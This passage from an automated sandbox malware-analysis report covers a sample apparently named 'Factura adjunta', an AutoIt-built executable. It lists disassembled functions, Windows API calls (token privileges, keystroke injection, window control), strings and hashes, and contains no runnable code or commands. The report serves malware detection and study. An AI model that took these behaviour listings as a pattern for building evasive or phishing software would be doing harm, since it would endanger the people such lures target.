                            • Instruction ID: 27d38a94a9c70678f3e232f80f6e71ba191db03a98e0e905f1aac0170dfff680
                            • Opcode Fuzzy Hash: 9b54afcf07a23b9ff4e0bf05bec20c5cd47f57aecc711df460a32f44145caaaf
                            • Instruction Fuzzy Hash: 8501A2B9600942EFC305EB69C845E6AFBA9FF8A3107148159F819C7702DB34EC21CBE0
                            Function 007D4A93 Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                            Download Yara Rule
                            APIs
                            • __lock_file.LIBCMT ref: 007D4AD6
                              • Part of subcall function 007D8D68: __getptd_noexit.LIBCMT ref: 007D8D68
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: __getptd_noexit__lock_file
                            • String ID:
                            • API String ID: 2597487223-0
                            • Opcode ID: 0101c1a004751bc2e5c7ebe5ac9e2d82a00fdbbad3a0526345f5bb9157e9b5b0
                            • Instruction ID: 98c3d3a5cafa1c60f864f2e57469486959e776e83cb135888cd8453f3df2c206
                            • Opcode Fuzzy Hash: 0101c1a004751bc2e5c7ebe5ac9e2d82a00fdbbad3a0526345f5bb9157e9b5b0
                            • Instruction Fuzzy Hash: 75F0AF71940209EBDFA1AF75CC0A79E37B1AF40325F188517B424AA3D1DB7C8A50DF52
                            Function 007B4FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                            Download Yara Rule
                            APIs
                            • FreeLibrary.KERNEL32(?,?,008762F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 007B4FDE
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: FreeLibrary
                            • String ID:
                            • API String ID: 3664257935-0
                            • Opcode ID: 25f165cb19e919e8c243f5afbff99b8194dda280cb758fd8055730064eb63bd5
                            • Instruction ID: 4d623afd242f3b1462b1ca2968821eaede9cc3525b0d5ab392abe1785b5f7c08
                            • Opcode Fuzzy Hash: 25f165cb19e919e8c243f5afbff99b8194dda280cb758fd8055730064eb63bd5
                            • Instruction Fuzzy Hash: CAF01571505712CFCB349F64E4949A6BBE2BF043293288A3EE1D683612C779A850DB40
                            Function 007D09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                            Download Yara Rule
                            APIs
                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007D09F4
                              • Part of subcall function 007B7D2C: _memmove.LIBCMT ref: 007B7D66
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: LongNamePath_memmove
                            • String ID:
                            • API String ID: 2514874351-0
                            • Opcode ID: 64d51dd62f679d6e0d4051af815b9946ad951f49657c128ce54928101bc6e3fc
                            • Instruction ID: cfcb64669a2c80fdf5c166c024466b01b3c9c86fa837d3c913b9926e724cb587
                            • Opcode Fuzzy Hash: 64d51dd62f679d6e0d4051af815b9946ad951f49657c128ce54928101bc6e3fc
                            • Instruction Fuzzy Hash: 18E08676E0522897C720D6589C0AFFA77ADDFC8690F0401B5FD0CD7245D9649C818690
                            Function 00819129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: __fread_nolock
                            • String ID:
                            • API String ID: 2638373210-0
                            • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                            • Instruction ID: fbd3da32964712c5b9d8870510f636873ca37a68ea9b252c6354bd64fffe7ab3
                            • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                            • Instruction Fuzzy Hash: 1FE06DB1104B009BD7348A24D814BE373E4FB06315F00081DF2DAC3341EB66B8818759
                            Function 007B5DAE Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                            Download Yara Rule
                            APIs
                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,007EE16B,?,?,00000000), ref: 007B5DBF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: FilePointer
                            • String ID:
                            • API String ID: 973152223-0
                            • Opcode ID: 83ce834ae3c0c8f405635b1d1687c7d3b8d3fdedc15e7eff798451d95ac36070
                            • Instruction ID: 09ee6808693e744731b8fba83965c6ff79fef0a59d3dd4eec40626e90fe5c243
                            • Opcode Fuzzy Hash: 83ce834ae3c0c8f405635b1d1687c7d3b8d3fdedc15e7eff798451d95ac36070
                            • Instruction Fuzzy Hash: 82D0C77464020CBFE710DB80DC46FAD777CE745710F100194FE0456290D6F27D508795
                            Function 007D548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: __wfsopen
                            • String ID:
                            • API String ID: 197181222-0
                            • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                            • Instruction ID: 5ae58a70df629a4dcfe6c34169258ee8ad4f1ac11fd8d45fb4a51d6787e2e4b1
                            • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                            • Instruction Fuzzy Hash: 20B0927684020CB7DE012E82EC02A593B299B40679F808021FB0C18262A677A6A0968A
                            Function 0081D2E6 Relevance: 1.4, APIs: 1, Instructions: 198COMMON
                            Download Yara Rule
                            APIs
                            • GetLastError.KERNEL32(00000002,00000000), ref: 0081D46A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ErrorLast
                            • String ID:
                            • API String ID: 1452528299-0
                            • Opcode ID: 93209fe7ba38925054b937113b2df42b8510d072a630df829b005a1b8e26e1d3
                            • Instruction ID: fbf0af776d07ce6c79aa5f39574d83d4470809ec28f5c0eb907f8b91c9d0232a
                            • Opcode Fuzzy Hash: 93209fe7ba38925054b937113b2df42b8510d072a630df829b005a1b8e26e1d3
                            • Instruction Fuzzy Hash: FA712D30204701CFC714EF24D495BEAB7E5FF88314F04496DF9969B2A2DB34A949CB56
                            Function 007D0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction ID: 0c829a886b70fbdfeeae3b860b9255b94f37f9138a5d4ffd1b679f984a64fcc2
                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                            • Instruction Fuzzy Hash: AC31C170A001059FC718EF59D480A69FBB6FB99300F68AAA6E409CB751D735EDC1CBC0
                            Function 007622A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNELBASE(000001F4), ref: 007622B1
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198887255.0000000000760000.00000040.00001000.00020000.00000000.sdmp, Offset: 00760000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_760000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction ID: c35b56c5f461bb511771ca92ea74f822b6ee10f1ebcde4c36aecaee50f6fa214
                            • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                            • Instruction Fuzzy Hash: 8BE0E67494010EDFDB40EFB4D54969E7FB4FF04701F100161FD01D2281D6309D508A72

                            Non-executed Functions

                            Function 0083CDAC Relevance: 70.6, APIs: 37, Strings: 3, Instructions: 637windowkeyboardnativeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                            • NtdllDialogWndProc_W.NTDLL(?,0000004E,?,?,?,?,?,?), ref: 0083CE50
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0083CE91
                            • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0083CED6
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0083CF00
                            • SendMessageW.USER32 ref: 0083CF29
                            • _wcsncpy.LIBCMT ref: 0083CFA1
                            • GetKeyState.USER32(00000011), ref: 0083CFC2
                            • GetKeyState.USER32(00000009), ref: 0083CFCF
                            • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0083CFE5
                            • GetKeyState.USER32(00000010), ref: 0083CFEF
                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0083D018
                            • SendMessageW.USER32 ref: 0083D03F
                            • SendMessageW.USER32(?,00001030,?,0083B602), ref: 0083D145
                            • SetCapture.USER32(?), ref: 0083D177
                            • ClientToScreen.USER32(?,?), ref: 0083D1DC
                            • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0083D203
                            • ReleaseCapture.USER32 ref: 0083D20E
                            • GetCursorPos.USER32(?), ref: 0083D248
                            • ScreenToClient.USER32(?,?), ref: 0083D255
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0083D2B1
                            • SendMessageW.USER32 ref: 0083D2DF
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0083D31C
                            • SendMessageW.USER32 ref: 0083D34B
                            • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0083D36C
                            • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0083D37B
                            • GetCursorPos.USER32(?), ref: 0083D39B
                            • ScreenToClient.USER32(?,?), ref: 0083D3A8
                            • GetParent.USER32(?), ref: 0083D3C8
                            • SendMessageW.USER32(?,00001012,00000000,?), ref: 0083D431
                            • SendMessageW.USER32 ref: 0083D462
                            • ClientToScreen.USER32(?,?), ref: 0083D4C0
                            • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0083D4F0
                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 0083D51A
                            • SendMessageW.USER32 ref: 0083D53D
                            • ClientToScreen.USER32(?,?), ref: 0083D58F
                            • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0083D5C3
                              • Part of subcall function 007B25DB: GetWindowLongW.USER32(?,000000EB), ref: 007B25EC
                            • GetWindowLongW.USER32(?,000000F0), ref: 0083D65F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend$ClientScreen$LongWindow$State$CaptureCursorMenuPopupTrack$DialogInvalidateNtdllParentProc_RectRelease_wcsncpy
                            • String ID: @GUI_DRAGID$F$h)
                            • API String ID: 302779176-423149219
                            • Opcode ID: 4ea0899ca9452c324a89f293fb3ee58c799bce38ccf61b80f0d796281897fa5a
                            • Instruction ID: 5c6ccc9505a8295410846c0a2fc761f30e5c7b9eddbd4f625a4db27a9d964d16
                            • Opcode Fuzzy Hash: 4ea0899ca9452c324a89f293fb3ee58c799bce38ccf61b80f0d796281897fa5a
                            • Instruction Fuzzy Hash: 59427A70604341AFD725CF28C848EAABBE5FF88314F140A29F699D72A1E731D854DBD2
                            Function 0083804A Relevance: 61.8, APIs: 33, Strings: 2, Instructions: 571windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0083873F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: %d/%02d/%02d$h)
                            • API String ID: 3850602802-2906427340
                            • Opcode ID: 8cd3117bd80e9ae4da0959f2e956881e62df6c155de1fb6d36a1b63dcf82c660
                            • Instruction ID: 45f6d903726c5fde597225ac38040dc76f59b7dcf30990cbae3cd69db8a214bd
                            • Opcode Fuzzy Hash: 8cd3117bd80e9ae4da0959f2e956881e62df6c155de1fb6d36a1b63dcf82c660
                            • Instruction Fuzzy Hash: EB12CD71500308EBEB258F68CC49FAA7BB9FF85714F204529F915EB2A1EF749941CB90
                            Function 007C710E Relevance: 50.6, APIs: 19, Strings: 7, Instructions: 5093COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: _memmove$_memset
                            • String ID: DEFINE$Oa|$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                            • API String ID: 1357608183-3194822319
                            • Opcode ID: a0cc66b0df2954fab7fcc8b7a1a4b07b3cc9693a5e0f3646570d4e255f786ff6
                            • Instruction ID: b9c0520b6fd2d5e64851e4ada74f2c5ab7b32d8fe4b613b1764c537da8933e75
                            • Opcode Fuzzy Hash: a0cc66b0df2954fab7fcc8b7a1a4b07b3cc9693a5e0f3646570d4e255f786ff6
                            • Instruction Fuzzy Hash: EE938071A0021ADBDB64CF58C885BADB7B1FF48314F25816EE955EB2D0EB749E81CB40
                            Function 007B4A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • GetForegroundWindow.USER32(00000000,?), ref: 007B4A3D
                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007EDA8E
                            • IsIconic.USER32(?), ref: 007EDA97
                            • ShowWindow.USER32(?,00000009), ref: 007EDAA4
                            • SetForegroundWindow.USER32(?), ref: 007EDAAE
                            • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 007EDAC4
                            • GetCurrentThreadId.KERNEL32 ref: 007EDACB
                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 007EDAD7
                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 007EDAE8
                            • AttachThreadInput.USER32(?,00000000,00000001), ref: 007EDAF0
                            • AttachThreadInput.USER32(00000000,?,00000001), ref: 007EDAF8
                            • SetForegroundWindow.USER32(?), ref: 007EDAFB
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 007EDB10
                            • keybd_event.USER32(00000012,00000000), ref: 007EDB1B
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 007EDB25
                            • keybd_event.USER32(00000012,00000000), ref: 007EDB2A
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 007EDB33
                            • keybd_event.USER32(00000012,00000000), ref: 007EDB38
                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 007EDB42
                            • keybd_event.USER32(00000012,00000000), ref: 007EDB47
                            • SetForegroundWindow.USER32(?), ref: 007EDB4A
                            • AttachThreadInput.USER32(?,?,00000000), ref: 007EDB71
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                            • String ID: Shell_TrayWnd
                            • API String ID: 4125248594-2988720461
                            • Opcode ID: dfc7e02c67c60af782399ca0a0534d7cb62e6e997bd7f92b4c849d54f8edbfc8
                            • Instruction ID: ebef5d583aa8e11753a7c8db4633fb47c4fd57c728178eb05a4cf9b80cd9e9a3
                            • Opcode Fuzzy Hash: dfc7e02c67c60af782399ca0a0534d7cb62e6e997bd7f92b4c849d54f8edbfc8
                            • Instruction Fuzzy Hash: 87315471E413587BEB316FA29C4AF7E3E6CEB88B50F114425FB05EA1D1D6B45D00AAE0
                            Function 00808858 Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 224COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00808CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00808D0D
                              • Part of subcall function 00808CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00808D3A
                              • Part of subcall function 00808CC3: GetLastError.KERNEL32 ref: 00808D47
                            • _memset.LIBCMT ref: 0080889B
                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 008088ED
                            • CloseHandle.KERNEL32(?), ref: 008088FE
                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00808915
                            • GetProcessWindowStation.USER32 ref: 0080892E
                            • SetProcessWindowStation.USER32(00000000), ref: 00808938
                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00808952
                              • Part of subcall function 00808713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00808851), ref: 00808728
                              • Part of subcall function 00808713: CloseHandle.KERNEL32(?,?,00808851), ref: 0080873A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                            • String ID: $default$winsta0$winsta0\default
                            • API String ID: 2063423040-1685893292
                            • Opcode ID: 64144411669ee269bc91d3c17d4360d23d7579af5bac2707668e08108acdec21
                            • Instruction ID: 34ba4ac3e29cfa6d473c4eb495fde72d5a10a57708946e89bdcf2f700ead192c
                            • Opcode Fuzzy Hash: 64144411669ee269bc91d3c17d4360d23d7579af5bac2707668e08108acdec21
                            • Instruction Fuzzy Hash: AF815971A00219EFDF51DFA4DC49AEE7BB8FF04304F08452AF950E62A1DB358E949B61
